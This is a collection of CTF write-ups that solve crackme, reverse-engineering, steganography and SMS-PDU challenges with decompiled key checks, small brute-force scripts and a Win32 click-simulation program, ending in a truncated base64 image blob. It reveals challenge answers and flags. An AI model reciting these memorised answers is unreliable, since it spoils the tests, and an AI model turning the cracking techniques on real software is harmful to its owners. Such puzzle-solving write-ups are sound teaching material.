Key Logic:
if(k == (j1 ^ (0x67782aef ^ j1 ^ j - 1422) ^ j - 2))
    textview.append("That's OK. Come in.");
else
    textview.append("No, that is not OK!");

where
    k = inputs that user type
    j = 0x67782aef + 2
    j1 can be 12 from the code

More Information:
Decompiling the file reveals 2 java files in which only the AccessControl.java is of interest to us.
My approach in finding the condition in gaining access is to find the line where it indicates that you are “authorized”.
In this puzzle that will be “That’s OK. Come in.”
The If statement has a total of 3 unknown variables. After tracing upwards, you will discover that k is actually what the user type in the text box. J is defined as 0x67782aef + 2 and j1 can be either 12 or 3L * (16 + (0x67782aef - 2)) - 0x57bac1daL - 2L;

Let’s take the easy way out by letting j1 be 12. We write a 1 liner PHP script and run the result. Type in the emulator and test if it works.

Solution:
Run a php script =D


Result:
0x67782563
Screenshot:


Using the answer, we solved the Android CrackMe. :D

cheers
Elucidator

Wednesday, May 29, 2013

HackYou CTF 2012 : Binary - OpenSource

HackYou CTF 2012 : Binary - OpenSource

Hints given to us:


Choosing "Open-Source", we got a code.c file. Inside this .c file, we got the following source code.

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        printf("what?\n");
        exit(1);
    }

    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
        printf("you are wrong, sorry.\n");
        exit(2);
    }

    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
        printf("ha, you won't get it!\n");
        exit(3);
    }

    if (strcmp("h4cky0u", argv[3])) {
        printf("so close, dude!\n");
        exit(4);
    }

    printf("Brr wrrr grr\n");

    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}

Recommended Tools:
Brains
C Compiler

Solution to this challenge:
I've started solving this by analysing the source code.

...
if (argc != 4) {
...

Looking at the above code snippet, since "argc" must be 4. We know that it requires 3 arguments.


...
unsigned int first = atoi(argv[1]);
if (first != 0xcafe) {
    printf("you are wrong, sorry.\n");
    exit(2);
}
...

Now, the first argument is being converted to int and stored inside unsigned int, first.
Then the value of first is being compared to 0xcafe.
As 0xcafe is in hex, converting this to int means that argv[1] must be 51966.
In case you are wondering why did i confirm that, please read the documentation of atoi.

...
unsigned int second = atoi(argv[2]);
if (second % 5 == 3 || second % 17 != 8) {
    printf("ha, you won't get it!\n");
    exit(3);
}
...

Now, let's take a look at the 2nd argument.
It's being converted to int like the 1st argument and stored inside unsigned int, second.
The value that we want is that when divided by 5 must not have remainder 3 and when divided by 17 must have a remainder of 8.
Now's that's easy. Let's satisfy the 2nd condition. Since second divided by 17 must have a remainder of 8.
Thus, second must be 17+8 = 25
Ok, using 25 as the value of second. Let's check whether it satisfy the condition of the first one.
17%5=2
It satisfy the first condition as well as the remainder is 2.
Thus, we now know that argv[2] is 25

...
if (strcmp("h4cky0u", argv[3])) {
    printf("so close, dude!\n");
    exit(4);
}
....

Ok, looking at the documentation for strcmp.
We know that argv[3] must be h4cky0u

Now, you can either compile the above source code and feed in the arguments or you can manually calculate it.
I chose the latter option.

unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;
printf("Get your key: ");
printf("%x\n", hash);

Substituting all the arguments with the values that we have gotten. We got the following.
51966 * 31337 + (25%17)*11 + 7 - 1615810207
1628458542 + 88 - 7 - 1615810207
12648430

Since the final value of the hash is in hexadecimal, using calc to convert it.
The key is C0FFEE

cheers,
0x4a61636f62

pCTF 2011 : Mission 6 - Fun with Numb3rs (100 Points)

pCTF 2011 : Mission 6 - Fun with Numb3rs (100 Points)

Hints given to us:
Uh oh… This door is protected with number scroll authenticator. There's "powered by .NETv4" sign.
Find out the combination and get the key!

These are the original files:
D573190633309f8a930bccbd199a16a4564c35fb.zip
Readme_Fun_with_Numb3rs.txt

Recommended Tools:
Reflector Decompiler (http://www.reflector.net/); Decompile .net
Use SandBoxie (http://www.sandboxie.com/) to siam the 30 days trial

Key Logic behind cracking the mission:
if ((((((num + num4) - num2) + ((num * num) * num2)) - num3) == ((num2 * ((num3 * 0x22) + (num5 - num))) + 0x1d40)) && (num > 0x4d))

Brute force the logic:
for(int a = 78; a <= 255; a++){     for(int b = 0; b <= 255; b++){         for(int c = 0; c <= 255; c++){             if((a + b*c) - b + ((a*a*b) - c) == (b * ((c * 34) + ((3*a) - a)))+ 7488){                 System.out.println("a : " + a);                 System.out.println("b : " + b);                 System.out.println("c : " + c);             }         }     } }



Answer:
You will get the following results.
a : 89
b : 144
c : 233

Making use of the numbers
Since we got the 3 numbers, let's use it on the binary by adjusting the sliders like this.



After adjusting the sliders, you will get this messagebox, which is the key. :D



I have also attached the source code for the brute-force application.
File:Crack.java


cheers
Elucidator

NuitDuHack2013 Crackme 100 (Huge.js)

NuitDuHack2013 Crackme 100 (Huge.js)

A gigantic javascript file is given to us (about 25mb text file)
huge.zip

Recommended Tools:
- Notepad++
- Firefox Browser

Opening the file in Notepad++, we can see that it contains a function called "x" and a very long bunch of hexadecimal characters
The hexadecimal characters are most likely encoded javascript code and the function "x" is the decoding function

In order to decode the javascript code, we can create a html file and use the x function to help us decode the hexadecimal characters.
Something like this


Load the above html file into your browser (I used Firefox) and it should show you the decoded javascript code like this


Wait a minute, this looks exactly like the encoded code at the beginning of the puzzle.
This is because the javascript code is encoded multiple times and we need to decode it multiple times in order to get the original code
Copy the hexadecimal characters from the browser output and paste it back into the "abc" variable in the html file.
Reload the html file in the browser to run the decoding a second time.
Repeat this for 6 times and you will get the final actual javascript code


The actual code consists of multiple functions that perform hashing on the password.
There is also a function "unlock" which basically checks for a certain password hash.
Analyzing this function, we know that the password is 5 characters long and it can only contains a certain list of valid characters
With that, we can write a brute force function to brute force the password out


Run the brute force script in a browser and after awhile, it will give you the flag
(Do note that the brute force will take awhile, the browser may prompt you that the script is unresponsive. If it does, do not stop the script, ignore the warning or wait for the script to complete)
(For this, I recommend Firefox, as Firefox has the option of "Don't ask me again" which will save you a lot of waiting and clicking frustration)


Cheers,
thegrayone

NuitDuHack2013 Steganography 1

The question is:

"This time, take one LSB out of two, reverse the whole bit stream, add
a 0 every seven bits, uncompress, keep only one byte out of two and
you'll be done. Really."

We are given 2 attachments as attached.

bitmap.zip

Since it is only 1 point, it is
quite straight forward. Unzip the bitmap.zip, open up to view the
picture. The flag is written on the picture itself.

The flag is:
ffb19ff73f8268231392909c4b11ee56

Regards,
billa316

Padocon Qualifiers CTF 2010 : CatchMe - 200 Points

Padocon Qualifiers CTF 2010 : CatchMe - 200 Points

File given to us:
This is the original file:
CatchMeIfYouCan.zip


Recommended Tools:
Brains and Programming skills

Solving the Puzzle:
Let's fire up the binary which we are given.


Hmmmm...i can't seem to click on the button. I guess i have to click on the button in order to solve this.
As the button moved away whenever i placed my mouse cursor near it.
I guess i have to either reverse the application but i didn't want to spend too much time trying to reverse this application.

Thus, I've decided to make use of my development skills to solve this puzzle.

Logic behind this Solution:
Since moving my mouse cursor near the button will cause it to move away.

I've decided to send WM_LBUTTONDOWN (http://msdn.microsoft.com/en-us/library/windows/desktop/ms645607(v=vs.85).aspx) & WM_LBUTTONUP (http://msdn.microsoft.com/en-us/library/windows/desktop/ms645608(v=vs.85).aspx) messages with SendMessage function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms644950(v=vs.85).aspx) to simulate the mouse cursor actions of clicking the button.

But in order to do that i need get the handle to CatchMeIfYouCan.exe.

So i've used FindWindow function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms633499(v=vs.85).aspx) to look for "Catch Me If You Can!"
Then i get the area of the binary using GetClientRect function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms633503(v=vs.85).aspx)

Brute-Force Logic:
#include<stdio.h>
#include<windows.h>
int main(int argc, char *argv[]){
    HWND hWnd;
    RECT rect1;
    hWnd = FindWindow(NULL,L"Catch Me If You Can!");
    GetClientRect(hWnd, &rect1);
    for( rect1.left = 0; rect1.left <= rect1.right ; rect1.left++ ){
        for( rect1.top = 0; rect1.top <= rect1.bottom ; rect1.top++ ){
            SendMessage(hWnd, WM_LBUTTONDOWN, 0, MAKELONG(rect1.left, rect1.top));
            SendMessage(hWnd, WM_LBUTTONUP, 0, MAKELONG(rect1.left, rect1.top));
        }
    }
}


Final Solution:
Once you have compiled the above code and get it to run. The button will stop moving and you can click on the button and you will be presented with a messagebox with the solution, "Zntus_WARTG_gAng"


I have attached the source code for the brute-force application so that you can try it on your own.


File:CatchMeIfYouCan.c


cheers
0x4a61636f62

ruCTF 2013 Mobile 100 The Big Squeeze

ruCTF 2013 Mobile 100 The Big Squeeze


The clue given is a txt file with a bunch of hexadecimal characters
sniffed.txt

Upon further research and considering this is in the mobile category, these lines are actually SMS PDU traffic

You can read more about the format on these 2 sites:
http://www.gsmfavorites.com/documents/sms/pdutext/
http://www.codeproject.com/Tips/470755/Encoding-Decoding-7-bit-User-Data-for-SMS-PDU-PDU

The main problem of this challenge is that SMS PDU converts 7-bit GSM message characters into 8-bit characters before transmitting them
The algorithm to decode them is described in the 2 links above

There is a tool available called "PDUSpy" which can be downloaded here
Use PDUSpy to decode each line in the text file
Eventually, you will get to one line which gives you the text as shown below


Take note of the UDH Elements portion
It shows that this text file actually contains a concatenated SMS with 254 parts
The lines in the text file are also not arranged in sequence.

The challenge now is to decode and rearrange the SMS parts according to the "SM sequence number" to recover the full SMS
Decoding a concatenated SMS is slightly different. Refer to the page below for an explaination
http://en.wikipedia.org/wiki/Concatenated_SMS

You could do it manually by decoding each line with PDUSpy and copying out the User Data (Text) portion to recover the SMS
OR you could write a script to do it
I wrote a php script that will decode the messages and saves them in a csv file (Do note that the conversion of 8 bit to 7 bit and the PDU format is a PITA to understand -_-)
After which, I used some excel magicks to re-arrange the SMS sequence and recover the full SMS
pduparser.php

Hey John. Here are the blueprints. Unfortunately my phone doesn't support MMS, so I had to find a workaround. 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